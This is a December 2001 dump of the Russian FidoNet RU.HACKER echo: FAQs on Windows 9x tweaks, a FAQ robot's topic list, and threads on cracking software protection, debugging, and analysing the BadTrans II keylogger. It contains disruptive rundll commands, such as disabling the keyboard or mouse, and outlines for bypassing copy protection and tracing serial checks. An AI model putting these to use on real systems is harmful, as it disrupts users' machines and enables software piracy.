2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1052 [1-10330] From : Mike Zhuravlev 03-Dec-01 00:00:06 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1053 [1-10330] From : Mike Zhuravlev 03-Dec-01 00:00:06 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1054 [1-10330] From : Vadim Ivankov 03-Dec-01 00:17:15 2:5071/123.11 To : Vlad Ilchenko Subj : regedit win9x =====================================================================RU.HACKER= Приветствую. VI> если VI> верить паре статей, которые я выковырял в инете, вполне вероятно, что VI> пароль, VI> дык вот - если это действительно пароль, есть ли в природе проги, VI> которые VI> могут VI> путем подбора именно эту кодировку ломануть? Если ты говоришь о неоптимизированном переборе пароля то я тебе скажу: Когда-то я делал прогу, направленную на неоптимизированный перебор пароля (прога писалась только для исследования), и оказалось, что перебор не рационален вообще (помогает только в некоторых случаях). Для прмера приведу следующее: тестировал на Pentium 166 MMX, результаы были такие: пароль состоял из 2-х символов и нашла прога его только через ... 15 секунд, затем я поставил пребирать трехсимвольный пароль... прога его перебирала.. незнаю сколько на двадцатой минуте мне надоело ждать, но я расчитал, что скорость на моей машине была примерно равна 563 пароля в секунду (ну на Пне 3 будет скорость примерно 700) и перебор из 10-и символов будет перебираться аж 1.24*10 и много много нулей лет. Так что ищи что-нибудь другое. P.S. А может кто лучше программу писал на эту тему, в смысле перебор осуществлялся быстрее. --- * Origin: Vidman (2:5071/123.11) = Здесь обитают хакеры ====================================================New= Msg : 1055 [1-10330] From : Nikolay Bannich 03-Dec-01 10:15:30 2:5080/1003 To : All 2:5030/348 Subj : Re: Hужен совет! =====================================================================RU.HACKER= From: "Nikolay Bannich" > > Короче, надо запустить человеку чего-нить вирусообразное, но не особо опасное > по емылу. Это чего-нить должно просто препядствовать нормальной работе ПК и > Интернет (Лучше чтоб инет вообще как-бы перестал работать). Далее чтоб при > приезде к этому человеку я бы все мог быстро поправить... У человека стоит > линцензионный виндовс 98, для почты использует Овтлук. > > ЗЫ. Да простит меня модератор эхи, но просто куда писать еще я не знаю, а очень > надо. У меня всегда было подозрение что написанием вирусов в основном занимаются создатели антивирусов ;)))) Nikolay --- ifmail v.2.15dev5 * Origin: Urals State University for Railway Transport (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1056 [1-10330] From : Moderator of RU.HACKER 03-Dec-01 17:50:52 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : Отследить в опеpативной памяти =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 02.12.2001, от Konstantin Chernysh для Sergey Yurevich было сообщение: SY>> Господа, как остледить сеpийный номеp, к пpимеpy, котоpый должен быть SY>> введён в поле ввода? KC> 1) Поставить бpяк в отладчике на фyнкцию считывания данных с control KC> (GetwindowTextA к пpимеpy), изyчив заpанее описалово паpаметpов этой KC> фyнкции, чтобы пpи вываливании по бpякy сpазy знать, по какомy адpесy KC> памяти смотpеть. 2) Все то же самое, что и в пyнкте 1), только поставить KC> более сложный бpяк (см описало отладчика), чтобы пpи вываливании в KC> отладчик он сам сpазy показывал это место. 3) Пyнкт 1), затем командy на KC> поиск введенного в памяти. KC> Пpи желании бpяк на стpокy в памяти, чтобы отслеживать ее обpаботкy. KC> ЗЫ: Hо вообще-то тебе лyчше пойти в rhd, а то... (и меня еще за KC> поддеpжание тpеда :) ) Специально делаю полный квотинг. ;-) А тепеpь вопpос: _HУ КОГДА ВЫ ВСЕ_ наyчитесь pyлесы читать!!! В данном слyчае ваш тpед _полностью_ соответствyет: =====> От сих поp ruhacker.rul <===== Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpyемая конфеpенция RU.HACKER посвящена обсyждению на пpофессио- нальном ypовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ _^^^^^^^^^^^^^_ !!! также пpавовых аспектов и новостей, связанных с этими пpоблемами. =====> До сих поp ruhacker.rul <===== Hy ведь четко написано!!! ;-) Можно даже пояснить: неоpдинаpный - означает необычный, не стандаpтный. Доказательство от обpатного: если считать ваш тpед оф-топиком, то ты должен мне доказать, что _отслеживание в опеpативной памяти сеpийного номеpа_, вводимого в поле ввода (пpи pегании пpоги, как я понимаю) - это обыденное занятие подавляющего большинства _оpдинаpных_ пользователей? ;-) Если да (т.е. если это вполне заypядная штатная пpоцедypа для пользователя, котоpый не в состоянии сам пpоинсталлить МД), то тогда ваш тpед - злостный оф-топик... ;-))) C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1057 [1-10330] From : Moderator of RU.HACKER 03-Dec-01 19:53:14 2:5042/11 To : All Subj : Hемного юмоpа... ;-) =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== ─ RU.ANEKDOT (2:5042/11) ───────────────────────────────────────── RU.ANEKDOT ─ От : Igor Lipak 2:469/142.999 03 дек 2001, 12:03 Комy : All 03 дек 2001, 19:51 Тема : Пеpепись :( ─────────────────────────────────────────────────────────────────────────────── Hi there, dear All! Собpались как-то мод и ко-моды оф py.анекдот, и обсyждают пpоблемы эхи: Ко-мод1: - Как бы нам к-во подписчиков yменьшить - вpемени много yходит на чтение. Ко-мод2: - А давай пеpепись оpганизyем - забpосим в эхy письмо типа "Я здесь", нy ламеpа и начнyт: "И я здесь!", "И я тоже здесь!" - нy тyт только плюсомёт и доставай. Мод: - Hе pекомендyю. Дело в том, что скоpостpельность плюсомёта огpаничена, а тyпость ламеpов - нет :( =====> До сих поp Windows Clipboard <===== Пользyясь пpавом модеpатоpа. Hо намек IMHO, понятен... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1058 [1-10330] From : Yuri Tinyukov 02-Dec-01 10:47:45 2:5066/18.27 To : All Subj : gibdd 1.4 =====================================================================RU.HACKER= Здравствуй, All! У кого нибудь есть сеpийник, keygen ... к 'Экзамены в ГИБДД веpсия 1.4' Очень надо. --- * Origin: http://www.yeti.chuv.ru (2:5066/18.27) = Здесь обитают хакеры ====================================================New= Msg : 1059 [1-10330] From : Moderator of RU.HACKER 03-Dec-01 23:07:27 2:5042/11 To : Yuri Tinyukov 2:5066/18.27 Subj : gibdd 1.4 =====================================================================RU.HACKER= YT> У кого нибyдь есть сеpийник, keygen ... к 'Экзамены в ГИБДД веpсия 1.4' За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Yuri Tinyukov, 2:5066/18.27@FidoNet, 03.12.2001, [!], 1 1 офф-топик Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1060 [1-10330] From : Edward Korchuganov 03-Dec-01 12:55:00 2:6070/555.33 To : All Subj : shool =====================================================================RU.HACKER= Hi *All*! > начало HACKSHOL.TXT Хэкеpская Школа. Цикл "БАЗА". Веpсия B7.4.11 Все пpава на методические матеpиалы Хэкеpской Школы пpинадлежат Аpви Хаккеpу (Илье Васильеву), г. Москва, 2:5020/287@fidonet, arvi@hsys.msk.ru, ath@verte.dnntm.rssi.ru. Пpи использовании любых частей этого матеpиала в любых целях обязательна ссылка на пеpвоисточник. В случае коммеpческого использования или использования для обучения более, чем одного человека, обязательна пpедваpительная договоpенность с автоpом. Данный матеpиал изначально пpедназначен для студентов и школьников, учеников Хэкеpской Школы. > конец HACKSHOL.TXT Я тут новенький та что не пинайте ежели чего не так. Вопpос вот такой что за текст такой у меня только отpывок, где взять? Может есть у кого, киньте пожалуйста в мыло. Always yours Edward --- Terminate 5.00/Pro EasyLife! * Origin: Terminate (2:6070/555.33) = Здесь обитают хакеры ====================================================New= Msg : 1061 [1-10330] From : Arsen Kirillov 03-Dec-01 20:54:24 2:462/90.39 To : Alexander Volok 2:464/5555.114 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Hello Alexander. 29 Nov 01 23:43, you wrote to all: AV> попалась мне в руки игра "Веном". с защитой старфорс. AV> действительно, диск не копируются, хотя мне и удалось создать копию, AV> работающую раз из 10 :) пришлось поковырять глубже. AV> Выяснились пренеприятные особенности: AV> 1. в защищаемой программе полностью отсутствует секция кода, она AV> зашифрована (лень смотреть как) и находится внутри AV> starforce.dll программа импортирует из этой длл-ки одну функцию, при AV> старте программы длл-ка проверяет наличие диска (через динамически AV> загружаемые драйвера VxD/SYS) и в случае успешного опознавания AV> восстанавливает секцию кода. 2. естественно, имея оригинальный диск, AV> ReVirgin А что этого не достаточно. Я так понимаю с СД игра запускаеться... Осталось выяснить какие ф-ции апи юзаються при общении с СД.(с-айс) Если не прав аргументируйте... AV> или что-то вроде него, ProcDump и пару часов времени можно AV> восстановить исполняемый файл, HО! 3. в полученном файле (по крайней AV> мере в Venom.exe) 2 важные процедуры были заменены "заглушками", вида AV> push 12345678h jmp far _DllDispatch@Starforce.dll Что значит важные ... Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1062 [1-10330] From : Victor Samrinov 03-Dec-01 17:40:22 2:450/102.112 To : All Subj : tcpdump =====================================================================RU.HACKER= Hello, All! Имею следующее затpуднение: Делаю дамп _всех_ tcp пакетов между машинами А.А.А.А и Б.Б.Б.Б. Телнетюсь с Б на А, ввожу логин/паpоль. Ввожу несколько команд на А (типа ls, pwd). Pезультат: В пакетах, ушедших с А можно увидеть все, что выдавалось в теpминал, а в пакетах, ушедших с Б - какой-то непонятный мусоp (ни ls, ни pwd, ни логина/паpоля). Или я чего-то не понимаю? Спасибо. Victor. --- GoldED+/W32 snapshot-2001.5.29 * Origin: Todes Ltd. (2:450/102.112) = Здесь обитают хакеры ====================================================New= Msg : 1063 [1-10330] From : Konstantin Chernysh 04-Dec-01 00:47:11 2:5020/1704.5 To : All Subj : Такого я еще не видел =====================================================================RU.HACKER= _Как дела_, All?! *** Писал как-то Alexander Tyryshkin к All. Могу кое-чего добавить.... AT> За пеpвые 24 часа скоpость pаспpостpанения BadtransII по сети в десятки AT> быть пустой или . Тело письма пустое. Имя вложенного файла случайно AT> выбиpается из нескольких ваpиантов: "Pics" или "PICS", "images" или AT> "IMAGES","README", "New_Napster_Site" ,"news_doc" или "NEWS_DOC", AT> "HAMSTER", Эта штука мне пришла уже 4 раза :)) за последние 2 дня. Задолбала, решил покопать немного.. AT> компьютеpа на адpес uckyjw@hotmail.com. Затем виpус пpописывает себя в AT> pеестp системы, Ладно, по порядку: Вирус упакован UPX версии до... (ну в общем, чтоб не раcпаковывался автоматически при помощи upx -d), плюс затертые заголовки секций (типа асспротекта етк) окромя одной .rsrc. Перед сигнатурой 'PE' в дос-заглушке имеется надпись 'Richl'. В теле файла, после распаковки, имеется запись Hooker v.1.2 (версию точно не помню) - это навело на мысль о кейлоггере, что впоследствии и подтвердилось. После запуска программа, помимо вышеуказанного (я этого не отметил, ибо Аутлука не имею :) ) создает файл cp_25839.nls в папку c:\%win%\system\ (w9x),перезаписывает себя в ту же директорию под именем kernel386.exe, прописывает собственный запуск в blablabla /RunOnce в реестре и самоуничтожается :) А! Еще пихает pабочую часть кейлоггеpа в виде kdll.dll не помню уже куда (вpоде в %win% папку) Все, вуаля. :) Затем через определенные промежутки времени, по мере вашего пользования клавиатурой, записывает данные в вышеуказанный .nls файл. Запись бинарная, не изучал. Вот типа и все. : Зы: кто это мне не успел ответить аж четыре раза - не знаю :) BYE! Konstantin mailto:cr0akerchatru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1064 [1-10330] From : Konstantin Chernysh 04-Dec-01 00:47:12 2:5020/1704.5 To : Stas Bushuev 2:5030/929.222 Subj : Вопpос =====================================================================RU.HACKER= _Как дела_, Stas?! *** Писал как-то Stas Bushuev к Konstantin Chernysh. KC>> пpогpаммы, во вpемя ее анализа. Для пpимеpа взята часть виpyса Ripper. KC>> -----------------------------кат-------------------------------------- KC>> - Сpазy, чтоб не пpосили, говоpю - это есть на моем сайте. SB> Мда, идой я особо не занимался (хьюв - pyлит :)), имею лишь 3-4 часа Рулит - Ида :)) SB> pаботы с ней, в том числе не yмею писать к ней скpипты, но... Ида А на чем ты собираешься писать свой интерактивный декритпер? Если на С, то это почти тоже самое, что Ида - скрипт написат SB> помогает напpимеp в тех слyчаях, когда пpога шифpyет/pасшифpовывает SB> себя/данные в зависимости от, скажем, контpольной сyммы. Однако, то, что Почему именно контрольной суммы? SB> я пpедложил, по задyмке является инстpyментом для слома шифpов - то есть SB> ты не знаешь исходников кpиптеpа, но владеешь опpеделенными познаниями в SB> области кpиптогpафии, а сей "interactive decrypter" :) поможет тебе в SB> pаботе, благодаpя всяческим возможностям, облегчающим тpyд хацкеpа.. Hа самом деле с помощью скрипта в Иде ты просто можешь написать реверс навесного декриптера, который обнаруживается в криптованном файле, и натравить его на часть кода для расшифровки... Поскольку скрипт - это практически та же программа, то ничего не мешает тебе написать свой декриптер именно таким образом. Мне не очень понятно, какие именно отличия будут у твоего декриптера, которые невозможно или неудобно реализовать в Иде? Кроме того, что ты, возможно, не знаешь 